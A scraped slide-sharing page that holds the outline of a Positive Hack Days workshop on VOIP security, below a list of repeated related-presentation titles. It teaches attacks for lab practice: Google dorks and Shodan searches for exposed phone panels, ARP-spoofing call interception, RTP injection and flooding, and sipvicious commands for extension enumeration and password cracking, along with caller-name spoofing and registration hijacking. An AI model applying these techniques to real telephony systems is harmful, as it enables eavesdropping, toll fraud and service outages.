From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
 
Tech Trends Report 2024 Future Today Institute.pdf
Tech Trends Report 2024 Future Today Institute.pdfTech Trends Report 2024 Future Today Institute.pdf
Tech Trends Report 2024 Future Today Institute.pdf
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024
 

Positive Hack Days. Gritsai. VOIP insecurities workshop

  • 1. VOIPinsecuritiesworkshop “I just called to say I pwn you I just called to say how much I care I just called to say I own you And I mean it from the bottom of my heart” Stevie Wonder
  • 2. Agenda VOIP PSTN & VOIP PSTN vs. VOIP VOIP protocols VOIP security Attacking VOIP Enumerating VOIP devices RTP attacks +demonstration SIPattacks +practice Further readings
  • 3. PSTN/ Public switched telephone network
  • 4. VOIP / Voice over Internet Protocol
  • 5. PSTN vs. VOIP Network PSTN – Closed network VOIP – Public network(Internet) End-user devices PSTN – Simple devices VOIP – Complex devices Authentication PSTN – No mobility (Authentication by wire) VOIP – Mobility
  • 6. VOIP protocols Signaling protocols Media protocols Call control and media stream use different routes
  • 7. VOIP protocols: SignalingShort overview SIPSession Initiation Protocol SDPSession Description Protocol H.323H.323 MGCPMedia Gateway Control Protocol SCCPSkinny Client Control Protocol RTCPReal-time Transfer Control Protocol
  • 8. VOIP protocols: Media and HybridShort overview Media RTP/SRTP Hybrid (signaling + media) IAX/IAX2
  • 9. VOIP insecurities Confidentiality eavesdropping, recording, … Availability DoS, buffer overflows, … Authentication registration hijacking, Caller ID spoofing, … Fraud toll fraud, data masquerading, … SPIT (SPAM over IP Telephony) voice phishing, unsolicited calling, …
  • 10. VOIP insecuritiesTopics for today Enumeration of VOIP devices search engines port scanning RTP eavesdropping/recording calls inserting data into media stream DoS SIP searching extensions Caller name spoofing DoS
  • 11. Enumerating VOIP devicesGoogle hacking Google hacking GHDB User manual -> request Google inurl: intitle: site:<Customer> ! Examples: Asterisk Management Portal: intitle:asterisk.management.portal web-access Cisco Phones: inurl:"NetworkConfiguration" cisco Cisco CallManager: inurl:"ccmuser/logon.asp" D-Link Phones: intitle:"D-Link DPH" "web login setting" Grandstream Phones: intitle:"Grandstream Device Configuration" password Linksys (Sipura) Phones: intitle:" SPA Configuration" PolycomSoundpoint Phones: intitle:"SoundPoint IP Configuration"
  • 12. Enumerating VOIP devicesShodan [1/2] www.shodanhq.com search for domain names, ips, ports
  • 13. Enumerating VOIP devicesShodan [2/2] Banner grabbing passwordlessSnom phones
  • 14. Enumerating VOIP devicesnmap VOIP scanners smap svmap (sipvicious) Fyodor’s nmap -sU UDP scanning common problems
  • 15. Enumerating VOIP devicesCommon ports VOIP protocols 5060-5070, 1718-1720, 2517, …. RTP ports are allocated dynamically Management protocols TCP 21-23, 80, 443, 8088, … UDP 161, 162, 69, … IANA Internet Assigned Numbers Authority grep<vendor> www.iana.org/assignments/port-numbers
  • 16. RTP Real-time Transport Protocol RFC 1889 (1996) ->RFC 3550 (2003) Media over IP/UDP Packer reordering Used with signaling protocols (SIP, H.323, MGCP) RTCP (Real-time Transport Control Protocol) RTCP port =RTP port + 1
  • 17. RTP Attacks Call interception Attacking layers2, 3 Decoding intercepted data Injection into call Finding RTP port Injecting media stream Denial of Service RTP flood
  • 18. RTP AttacksCall interception ARP spoofing Cain & abel ettercap arpspoof (dsniff) Wireshark Telephony VOIP calls / Demo
  • 19. RTP AttacksInjection: Synchronization in RTP sequence number position in media stream +=1 timestampsampling +=1 SSRCidentifying source const (random 32 bit value) payload type codec in use
  • 20. RTPAttacksInjection Unencrypted deployment issues (debug) QoSissues key distribution UDP – connectionless Data requirements: SSRC timestamp, sequence number – monotonically increasing timestamp, sequence number - fuzzing
  • 21. RTP AttacksInjection Finding RTP port InterceptSDP Port scan Media injection Requirements frequency codec Demo SDP || nmap rtpinsertsound not working 100%?
  • 22. RTP AttacksDenial of Service Flood Low bandwidth requirements Media stream = high load Authentication - SIP and again … UDP - connectionless / Demo rtpflood
  • 23. SIP Session Initiation Protocol Application layer (TCP/UDP) ASCII header SIP header ~= e-mail header URI
  • 24. SIP Components UA (User agent), Proxy, Registrar, Redirect Call viaProxy Call via Redirect
  • 25. SIP Attacks Using somebodies PBX Extension enumeration Bruteforce extension password Caller name spoofing Registration hijacking Denial of service Busy lines
  • 26. SIPRequests INVITEindicates a client is being invited to participate in a call session BYETerminates a call and can be sent by either the caller or the callee OPTIONSQueries the capabilities of servers REGISTERRegisters the address listed in the To header field with a SIP server ACKConfirms that the client has received a final response to an INVITE request CANCELCancels any pending request more …
  • 27. SIPAnswers 1хх Informational (100 Trying, 180 Ringing) 2xx Successful (200 OK, 202 Accepted) 3xx Redirection (302 Moved Temporarily) 4xx Request Failure (404 Not Found, 482 Loop Detected) 5xx Server Failure (501 Not Implemented) 6xx Global Failure (603 Decline)
  • 29. SIP AttacksUsing somebodies PBX PBX Extension enumeration Bruteforcing passwords Making a call Practice withSipvicious svmap <ip> svwar –e<extensions> <ip> -m<REQUEST> svcrack –u<extension> -d <dictionary> <ip> Setting up asoftphone
  • 30. SIP AttacksCaller name spoofing Caller Name spoofing Softphone Practicing X-Lite Softphone–caller name spoofing Display name‘ 1=1 -- Domain ip of UA Register disable
  • 31. SIP AttacksRegistration hijacking Registration hijacking INVITE to PBX Search user in Registar Registration is in Contact header: ip address Practicing with X-Lite Register settings rate
  • 32. SIP AttacksDenial of Service Denial of Service No auth -> INVITE <- TRYING… <- Busy here HTTP digest -> INVITE generation/storingnonce Practice inviteflood
  • 33. Further reading Set up a lab http://enablesecurity.com/resources/how-to-set-up-a-voip-lab-on-a-shoe-string/ Read and practice Hacking Exposed VoIP—Voice Over IP Security Secrets & Solutions Advanced attacks “Having fun with RTP” by kapejod “SIP home gateways under fire” by AnhängteDateien Fuzzing
  • 34. QA